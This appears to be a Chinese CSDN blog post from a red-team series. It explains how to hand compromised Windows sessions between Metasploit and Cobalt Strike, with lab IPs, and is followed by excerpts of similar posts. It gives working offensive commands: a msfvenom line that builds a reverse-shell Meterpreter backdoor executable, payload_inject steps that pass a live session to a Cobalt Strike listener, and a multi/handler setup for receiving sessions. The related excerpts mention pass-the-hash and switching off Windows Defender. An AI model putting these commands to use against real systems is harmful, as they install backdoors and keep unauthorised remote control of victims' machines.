MSF与CS会话互相传递

已于 2024-08-15 09:25:31 修改
阅读量277 收藏 10
点赞数 4
分类专栏: # 域渗透 红队 文章标签: 网络安全 安全 网络攻击模型
于 2024-08-15 09:21:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fishfishfishman/article/details/141207779
版权

作为C2工具,MSF和CS各有千秋,CS有着多种强大的自定义插件和易操作的图形化界面,而MSF集成了针对各类系统的Payload攻击代码,为了针对性的进行攻击,我们有时候会需要将MSF的会话转发到CS,或者相反

演示环境如下,MSF和CS部署在同一台主机上:

  • MSF:192.168.30.15
  • CS:192.168.30.15
  • 靶机:192.168.30.129

MSF转发CS

如果没有事先准备,可以用下面的执行生成一个后门文件上线

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.30.15 LPORT=8888 -f exe > shell.exe

上线后通过下面的指令将会话挂在到后台,方便我们回到MSF控制台进行会话转发操作

background

查看会话,确保有一个上线机器能让我们进行会话转发

image.png

然后在CS新增一个监听,其实不用特意新建,用原有做后门监听的监听器就可以

回到MSF,通过下面指令进行会话派送,其中主机地址和端口要设置的与上面我们创建的CS监听器一致

use exploit/windows/local/payload_inject
# payload类型与监听器监听的类型一致
set payload windows/meterpreter/reverse_http
# 设置CS主机地址和CS监听端口
set LHOST 192.168.30.15
set LPORT 38080
# 设置需要委派的会话编号
set session 3
# 禁止生成一个新的监听器用来服务payload连接
set DisablePayloadHandler true
exploit

运行后在CS可以看到MSF派送过来的会话,并且MSF原有会话不会丢失

image.png

CS转发MSF

一样,在上线前首先确保我们已有至少一个会话,我们就用上面获取的

image.png

新建一个监听器,用于转发会话到MSF,填入MSF的监听地址和端口,Payload选择Foreign类型

image.png

在MSF时输入下面的指令

msfconsole
use exploit/multi/handler
# payload类型与CS监听器一致
set payload windows/meterpreter/reverse_http
# 设置MSF本地监听地址
set LHOST 0.0.0.0
# 设置MSF自身监听的端口
set LPORT 4444
exploit

回到CS,右键会话点击新建会话(spawn),选择我们刚创建的MSF转发监听器,将会话转发到MSF

image.png

在MSF中可以看到收到CS的会话派送,可以在MSF中进行后渗透操作,并且CS中的原有会话不会丢失

image.png

白帽阿尔法
关注
专栏目录
csmsf联动概述
weixin_43873557的博客
02-08 2434
cobalt strike(简称CS)及Metasploit(简称msf)各有所长,cs更适合作为稳控平台,msf更适用于与各类内网信息搜集及漏洞利用。为了取各家之所长,我们进行联动。 获得beacon shell,启动socks shell ipconfig 目标机器在24.*网段,仅一个网段 思路:利用 beacon shell 在目标机器和团队服 务器之间建立 socks,而后再在本地利用proxychains 之类的工具连到目标内网即可。 查看团队服务器 socks 端口启起来了没有:netst
MSFCS联动】
一纸荒芜的博客
08-27 2747
msfcs
MSFCS联动
GoDunTong's Blog
04-08 4223
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
msfcs联动
qq_63501912的博客
02-06 955
msfcs之间的会话传递
MSFCS之间会话传递,互相派生,版本问题踩坑
qq_29060627的博客
10-12 603
cobaltstrike使用版本4.5,可以msf派生给cs4.5,但是cs4.5不能派生给msf,得换cobaltstrike4.1的版本。
【经验总结】CSMSF之间的会话传递
TeamsSix 的 CSDN 空间
01-29 2433
0x00 前言 众所周知,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework Metasplo
csmsf联动
FSecurity的博客
04-26 503
目录 cobalt strike和metasploit联动 1.使用kali、vps来做csmsf(这里我使用的vps是阿里云服务器) 2.xshell连接vps,进入msf使用模块use expsploit/multi/handler 3.如果vps没有metersploit就用命令行下载 github(Installing) 这里我是已经下载好了的 4.在模块里进行设置,我这里使用的IP是阿里云的内网IP(端口随便) 5.记住xshell的防火墙要关闭(这里我的已经关了) 看到绿色标注的“act
cs linux内网渗透,记一次利用cs进行内网渗透的过程
weixin_29497981的博客
05-15 1117
记一次利用cs进行内网渗透的过程​首先搭建好cs的服务端和客户端连接,下面正式进行渗透环境kali:192.168.0.226域控机:192.168.0.138成员机:192.168.0.251 192.168.0.141操作cs上线首先开启监听cobalt->listeners,host和beacons都为cs服务端的ip地址生成相应的windows木马,上传到靶机251中执行。选择对应的...
Cobalt Strike会话管理
f_carey的博客
01-06 550
Cobalt Strike会话管理1 增加 CS 会话2 利用 CS 会话生成 MSF 会话3 利用 msfvenom 生成的文件生成 MSF 会话4 利用 MSF 会话生成 CS 会话 1 增加 CS 会话 添加新侦听器 在获得的 session 会话中选择"新建会话(spawn)":选择新添加的侦听器 获取到新的会话 2 利用 CS 会话生成 MSF 会话 添加新外部侦听器 配置 MSF 如下 msf6 > use exploit/multi/handler
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1619
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
MSF&CS互相联动
剁椒鱼头没剁椒的博客
07-28 1818
在日常渗透测试或者是你偷偷干坏事的时候,可能会发现,CS确实是一个强大的后渗透工具,但是奈何CS很多关于漏洞的功能都是只能检测,但是不能攻击,所以需要CSMSF互相联动起来,这里我就利用一个永恒之蓝漏洞来。
csmsf的联合使用
qq_54030686的博客
11-18 1878
csmsf在内网渗透中的作用 cs主要用于,反弹会话,提权,内网渗透防线,但cs的exp,提权方面没有msf强,但cs以操作简单,图形化界面,比msf强,使用两种工具结合可以很好的完成渗透测试工作,至于empire,基于windows下,与msf功能类似,操作方法也不尽相同,后续带来empire使用方法 csmsf的联合,也就是会话的转移(类似于端口转发) msf会话转移 使用exploit/windows/local/payload_inject模块,开启新的端口,session选择自己想要转发的会话
csmsf权限传递
最新发布
Wincreds的博客
06-26 256
3. 配置Cobalt Strike:在Cobalt Strike中配置Metasploit RPC设置,使其能够连接到Metasploit的RPC服务。2. 启动Metasploit RPC服务:在Metasploit控制台中启动RPC服务,以便Cobalt Strike可以与Metasploit通信。1. 在Metasploit中获取会话:使用Metasploit渗透目标系统并获得会话。4. 接收会话:在Metasploit中配置并监听相应的端口,以接收传递过来的会话
msfcs互传,msfcs建立frp穿透
qq_42430287的博客
04-13 1916
msfcs互传,msfcs建立frp穿透
内网渗透之MSF&CS
weixin_54855337的博客
02-18 898
内网渗透,流量转发,隧道搭建
msf联动cs
hmysn的博客
12-31 2144
Cobalt Strike简称CS 用于团队作战使用,由一个服务端和多个客户端组成,能让多个攻击者这在一个团队服务器上共享目标资源和信息,我们在使用msf获得权限以后,可以将信息共享到cs上,使用cs来进行监听以及其他的操作。
msfcs之间互传session
qq_45300786的博客
07-14 446
https://www.cnblogs.com/hcrk/p/14419762.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值